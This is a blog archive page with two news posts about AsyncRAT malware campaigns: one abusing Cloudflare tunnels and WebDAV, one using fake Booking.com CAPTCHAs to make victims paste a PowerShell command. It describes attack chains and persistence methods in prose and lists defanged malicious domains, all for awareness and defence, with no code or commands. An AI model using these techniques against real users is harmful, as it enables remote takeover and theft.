Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label AsyncRAT attack. Show all posts
Malware Threat
AsyncRAT AsyncRAT attack Cloudfare Cyber Phishing Cyber Security Cyberattacks cybersecurity risks Malware Threat

AsyncRAT Campaign Abuses Cloudflare Services to Hide Malware Operations

 

Cybercriminals distributing the AsyncRAT remote access trojan are exploiting Cloudflare’s free-tier services and TryCloudflare tunneling domains to conceal malicious infrastructure behind widely trusted platforms. By hosting WebDAV servers through Cloudflare, attackers are able to mask command-and-control activity, making detection significantly more difficult for conventional security tools that often whitelist Cloudflare traffic. 

The campaign typically begins with phishing emails that contain Dropbox links. These links deliver files using double extensions, such as .pdf.url, which are designed to mislead recipients into believing they are opening legitimate documents. When the files are opened, victims unknowingly download multi-stage scripts from TryCloudflare domains. At the same time, a genuine PDF document is displayed to reduce suspicion and delay user awareness of malicious activity. 

A notable aspect of this operation is the attackers’ use of legitimate software sources. The malware chain includes downloading official Python distributions directly from Python.org. Once installed, a full Python environment is set up on the compromised system. This environment is then leveraged to execute advanced code injection techniques, specifically targeting the Windows explorer.exe process, allowing the malware to run stealthily within a trusted system component. 

To maintain long-term access, the attackers rely on multiple persistence mechanisms. These include placing scripts such as ahke.bat and olsm.bat in Windows startup folders so they automatically execute when a user logs in. The campaign also uses WebDAV mounting to sustain communication with command-and-control servers hosted through Cloudflare tunnels. 

The threat actors heavily employ so-called “living-off-the-land” techniques, abusing built-in Windows tools such as PowerShell, Windows Script Host, and other native utilities. By blending malicious behavior with legitimate system operations, the attackers further complicate detection and analysis, as their activity closely resembles normal administrative actions. 

According to research cited by Trend Micro, the use of Cloudflare’s infrastructure creates a significant blind spot for many security solutions. Domains containing “trycloudflare.com” often appear trustworthy, allowing AsyncRAT payloads to be delivered without triggering immediate alerts. This abuse of reputable services highlights how attackers increasingly rely on legitimate platforms to scale operations and evade defenses. 

Security researchers warn that although known malicious repositories and infrastructure may be taken down, similar campaigns are likely to reappear using new domains and delivery methods. Monitoring WebDAV connections, scrutinizing traffic involving TryCloudflare domains, and closely analyzing phishing attachments remain critical steps in identifying and mitigating AsyncRAT infections.
Read more »
Warning
AsyncRAT attack Booking.com scam Fake Captcha malware OTA phishing travel cybersecurity vacation scam alert Warning

Fake Booking.com CAPTCHAs Are Tricking Travelers Into Installing Malware

 

Cybercriminals are exploiting vacationers in a deceptive phishing campaign that mimics the well-known online travel agency, Booking.com. According to cybersecurity researchers at Malwarebytes Labs, this scam uses bogus CAPTCHA prompts to trick users into giving hackers remote access to their devices, compromising both personal and financial information.

The attack typically starts with links shared on social media platforms or gaming websites, sometimes even appearing as sponsored advertisements. These links redirect users to fraudulent sites impersonating Booking.com—a legitimate OTA (online travel agency) widely used for booking flights, hotels, car rentals, and travel packages.

Once a user clicks on the deceptive link, a counterfeit CAPTCHA prompt appears, asking them to check a box. This step secretly copies a command to the user's clipboard. The next prompt instructs users to run a specific keystroke combination on their device—a red flag, as this is not part of any authentic CAPTCHA process.

Behind the scenes, the copied text contains a PowerShell command. Executing it initiates the download of several files that install a Remote Access Tool (RAT) known as Backdoor.AsyncRAT. This software enables attackers to remotely monitor and take control of the victim's system.

How to identify and protect yourself from the Booking.com RAT scam:

Always verify URLs: Malwarebytes Labs highlights that these fake domains shift regularly and vary in how legitimate they appear. Some might resemble real Booking.com URLs, like (booking.)guestsalerts[.]com, while others are more obscure, such as kvhandelregis[.]com. The safest approach is to avoid clicking on social media links or ads and instead navigate directly to the website by typing the URL into your browser’s address bar.

Avoid using search engines for travel bookings: Searching for travel deals on platforms like Google may expose you to “malvertising,” where scammers replicate trusted brands to lure users through top-ranking sponsored results. It’s better to book directly with hotels, airlines, or verified OTAs.

Don’t trust CAPTCHA forms from unknown sources:
"Be wary of following instructions, such as executing commands, from websites, CAPTCHA forms, or social media videos, which can easily trick you into installing malware."

Disabling JavaScript in your browser can block clipboard-based exploits, though it may also interfere with the functionality of many legitimate websites.

Cybersecurity experts continue to stress vigilance, especially during peak travel seasons when scammers often ramp up such campaigns.
Read more »
Subscribe to: Comments (Atom)